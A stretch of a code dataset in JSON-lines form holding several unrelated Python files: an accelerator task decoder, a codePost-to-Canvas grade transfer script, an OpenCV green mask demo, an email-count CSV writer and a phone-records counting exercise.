unittest.main()\n","repo_name":"YRSNorwich/ProjectBlock","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":7919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"8261796904","text":"\"\"\"\n This module takes in a task and returns the decoded task\n\n You can instantiate by calling decoder(task_length)\n\n Task structure:\n\n Total - 128 bit\n Supported max DRAM - 4GB\n Min Block Size - 64kB\n Max allocable blocks- 256\n Max allocable Size - 8MB\n\n OPCODE Format for TFUs\n\n [7:0] Acc ID\n [23:8] Input0 memory\n [31:24] Input0 Size\n [47:32] Input1 memory\n [55:48] Input1 Size\n [71:56] Output memory\n [79:72] Output size\n [87:80] Control - Optional\n [95:88] Task ID - Optional\n [99:96] Process ID - Optional\n\n OPCODE Format for CPU\n\n [7:0] Instr ID\n [23:8] src0\n [39:24] src1\n [55:40] dst0\n [63:56] control - Optional\n\n\"\"\"\n\nimport sys\n\nimport accelerators\n\nclass TaskDecode:\n\n def __init__(self, task_len):\n self.task = '0' * task_len\n self.task_len = task_len\n self.task_dict = {}\n self.task_id = 0\n self.task_id_max = 1024*1024\n\n def run_cycle(self, task_tuple):\n task = task_tuple[0]\n task_valid = task_tuple[1]\n\n self.task = str(task)\n flag = False\n\n if(task_valid):\n flag = self.decode()\n\n # Decode success and input was valid\n if(flag):\n return (self.task_dict, 1)\n\n else:\n # Decode failed\n sys.exit(\"Invalid unidentified task: %s\" % (self.task))\n # Input was not valid, return the output valid to be 0\n else:\n return (None, 0)\n\n def decode(self):\n\n # First check whether the instruction format is for CPU/TFU\n instr = accelerators.instr_decode[int(self.task[0:2], 16)]\n\n if(instr in accelerators.iTFU):\n #Since each field is atleast 4 bits, we don't need binary rep\n acc_id = self.task[0:2]\n inp0_mem = self.task[2:10]\n inp0_size = self.task[10:12]\n inp1_mem = self.task[12:20]\n inp1_size = self.task[20:22]\n out_mem = self.task[22:30]\n out_size = self.task[30:32]\n control = self.task[32:34]\n\n #TEMP task id is local\n self.task_id= self.task_id + 1 if ((self.task_id + 1) < self.task_id_max) else 0\n task_id = str(self.task_id)\n\n # populate the task dict\n self.task_dict = {'accelerator' : instr,\n 'inp0_mem' : int(inp0_mem,16),\n 'inp0_size' : int(inp0_size,16),\n 'inp1_mem' : int(inp1_mem,16),\n 'inp1_size' : int(inp1_size,16),\n 'out0_mem' : int(out_mem,16),\n 'out0_size' : int(out_size,16),\n 'task_id' : task_id,\n 'control' : int(control,16),\n 'instrType' : 'TFU'\n }\n\n return True\n\n elif(instr in accelerators.iCPU):\n\n src0 = self.task[2:10]\n src1 = self.task[10:18]\n dst0 = self.task[18:26]\n control = self.task[26:28]\n\n #TEMP task id is local\n self.task_id= self.task_id + 1 if ((self.task_id + 1) < self.task_id_max) else 0\n task_id = str(self.task_id)\n\n # populate the task dict\n self.task_dict = {'accelerator' : instr,\n 'src0' : int(src0,16),\n 'src1' : int(src1,16),\n 'dst0' : int(dst0,16),\n 'control' : int(control,16),\n 'task_id' : task_id,\n 'instrType' : 'CPU'\n }\n\n return True\n\n else:\n # Unidentified instruction\n return False\n\nif __name__ == '__main__':\n\n decoder_hts = TaskDecode(16)\n print(decoder_hts.run_cycle(('1000R000R100R200', 1)))\n print(decoder_hts.run_cycle(('1000R000R100R200', 0)))\n print(decoder_hts.run_cycle(('06000000000000000000123123123', 1)))\n","repo_name":"hpu-developers/HPUSim","sub_path":"DUT/task_decode.py","file_name":"task_decode.py","file_ext":"py","file_size_in_byte":4294,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"40491512682","text":"\"\"\"\nThis script interfaces with canvas and codepost.io\nto transfer grades of any assignment from codepost.io\ninto the canvas gradebook.\n\nThis is intended to be run once after the conclusion of\nthe grading of an assignment. It will only ever update\ngrades in Canvas if the canvas grade is missing (*and*\nthe --commit option has been provided; otherwise a\nreport of potential actions will be produced). If\ngrades need to be changed after this run, it should be\ndone manually.\n\nTODO: this script is complete, but needs troubleshooting\n\n\"\"\"\nfrom config import config\nfrom course import course\nfrom codepostUtils import get_assignment_id\nfrom canvasUtils import getAssignments\nfrom canvasUtils import getGrade\nfrom canvasUtils import setGrade\nimport argparse\nimport codepost\nimport pprint\nimport sys\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"assignment_name\", help=\n \"\"\"The codePost assignment id to pull scores FROM\n \"\"\")\nparser.add_argument(\"--commit\", action='store_true', help=\n \"\"\"Commmits the changes to the gradebook. If this is not\n provided, the script will run in coward mode and not make\n any modifications, only reporting what would have been done.\n \"\"\")\nargs = parser.parse_args()\n\ncodepost.configure_api_key(config.codepost_api_key)\n\n# alternative:\n# codepost_assignment_id = codepostUtils.get_assignment_id(assignment_name)\nassignment_name = args.assignment_name\ncodepost_assignment_id = get_assignment_id(assignment_name)\nif codepost_assignment_id is None:\n print(f\"Codepost assignment for '{assignment_name}' not found\", file=sys.stderr)\n exit(1)\ncanvas_assignments = getAssignments(name=assignment_name)\nif not canvas_assignments:\n print(f\"Canvas assignment for '{assignment_name}' not found\", file=sys.stderr)\n exit(1)\nelif len(canvas_assignments) > 1:\n print(f\"Multiple Canvas assignments for '{assignment_name}' found!\", file=sys.stderr)\n exit(1)\ncanvas_assignment = canvas_assignments[0]\ncanvas_assignment_id = canvas_assignment.id\ncommit_to_canvas = args.commit\n\nprint(f\"Processing assignment '{assignment_name}' (codepost id={codepost_assignment_id}) to (canvas id={canvas_assignment_id})...\")\nif not commit_to_canvas:\n print(f\"\\t(Coward mode)\")\n\n# 1. Request the submissions for an assignment directly\nassignment_submissions = codepost.assignment.list_submissions(id=codepost_assignment_id)\n\n# email (codepost) -> (codepostScore)\n# non-finalized submissions will have a None value\n# no submits will not have a key\ncodepost_grades = {}\n\nfor submission in assignment_submissions:\n submission_id = submission.id\n students = submission.students\n # only the actual submission contains the grade\n the_submission = codepost.submission.retrieve(id=submission_id)\n #grade is only defined if it is finalized, otherwise it is None\n #despite the API docs, it is a float!!\n if not the_submission.isFinalized:\n print(f\"WARNING Submission {students} not finalized!\")\n grade = the_submission.grade\n for student in students:\n codepost_grades[student] = grade\n\n# for each student in roster:\n# retrieve canvas grade\n# report\nfor nuid,p in course.students.items():\n codepost_grade = None if p.canvasEmail not in codepost_grades else codepost_grades[p.canvasEmail]\n canvas_grade = getGrade(canvas_assignment_id, p.canvasId)\n print(f\"{p}:\")\n print(f\" codepost: {codepost_grade}\")\n print(f\" canvas: {canvas_grade}\")\n message = None\n if canvas_grade is not None:\n print(f\" Skipping, Canvas grade exists...\")\n else:\n # change canvas grade...\n if codepost_grade is None:\n log = f\" Updating Canvas grade to 0, No Submission...\"\n score = 0\n comment = \"No Submission\"\n else:\n log = f\" Updating Canvas grade to {codepost_grade}...\"\n score = codepost_grade;\n comment = None\n print(log)\n if commit_to_canvas:\n setGrade(canvas_assignment_id, p.canvasId, score, comment)\n\n#pprint.pprint(codepost_grades)\nif not commit_to_canvas:\n print(\"Cowardly refusing to commit grades to canvas; rerun with --commit if you wanna.\")\n","repo_name":"cbourke/ComputerScienceI","sub_path":"scripts/codepost/codepostToCanvas.py","file_name":"codepostToCanvas.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"96"} +{"seq_id":"33384624193","text":"import numpy as np\nimport cv2\n\ncap = cv2.VideoCapture(0)\n\nlower_green = np.array([40, 100, 100])\nupper_green = np.array([100, 255, 255])\n\nwhile True:\n # Capture frame-by-frame\n ret, frame = cap.read()\n\n # convert image into gray\n # gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n # converts to HSV format\n image = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n # detect only green\n mask = cv2.inRange(image, lower_green, upper_green)\n res = cv2.bitwise_and(image, image, mask=mask)\n\n # flip image\n # image = cv2.flip(image,1)\n # Display the resulting frame\n cv2.imshow('frame', res)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n\n# When everything done, release the capture\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"rifa73/Covid19","sub_path":"GreenMask.py","file_name":"GreenMask.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"24321061986","text":"import csv\n\ndef write_to_csv(num_senders_desc, msgs_rcvd, both_dict_key):\n \"\"\"\n create a csv of person, sent and received columns\n \"\"\"\n\n file_for_question_1 = open('file_for_question_1.csv', 'w')\n\n with file_for_question_1:\n writer = csv.writer(file_for_question_1, lineterminator='\\n')\n writer.writerow(['person', 'sent', 'received'])\n for key in both_dict_key:\n try:\n # number of messages sent by a sender. need this try except clause\n # because the list of keys may have people that have received\n # an email and did not send an email and vice versa\n messages_sent = num_senders_desc[key]\n except:\n messages_sent = 0\n try:\n # number of messages received by a sender\n messages_received = msgs_rcvd[key]\n except:\n messages_received = 0\n\n writer.writerow((key, messages_sent, messages_received))\n\n return None\n","repo_name":"Allen8838/Data-Science-Projects","sub_path":"Red Owl/Modules/write.py","file_name":"write.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32182670369","text":"\"\"\"\nRead file into texts and calls.\nIt's ok if you don't understand how to read files.\n\"\"\"\nimport csv\nwith open('texts.csv', 'r') as f:\n reader = csv.reader(f)\n texts = list(reader)\n\nwith open('calls.csv', 'r') as f:\n reader = csv.reader(f)\n calls = list(reader)\n\n\n\"\"\"\nTASK 1:\nHow many different telephone numbers are there in the records? \nPrint a message:\n\"There are different telephone numbers in the records.\"\n\"\"\"\nunique_text_no = set(i for j in texts for i in j[:2])\nunique_call_no = set(i for j in calls for i in j[:2])\ncount = len(unique_text_no.union(unique_call_no))\nprint(\"There are {} different telephone numbers in the records.\".format(count))","repo_name":"Akshatt/unscramble-computer-science-problems","sub_path":"submit_Project 1/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":675,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}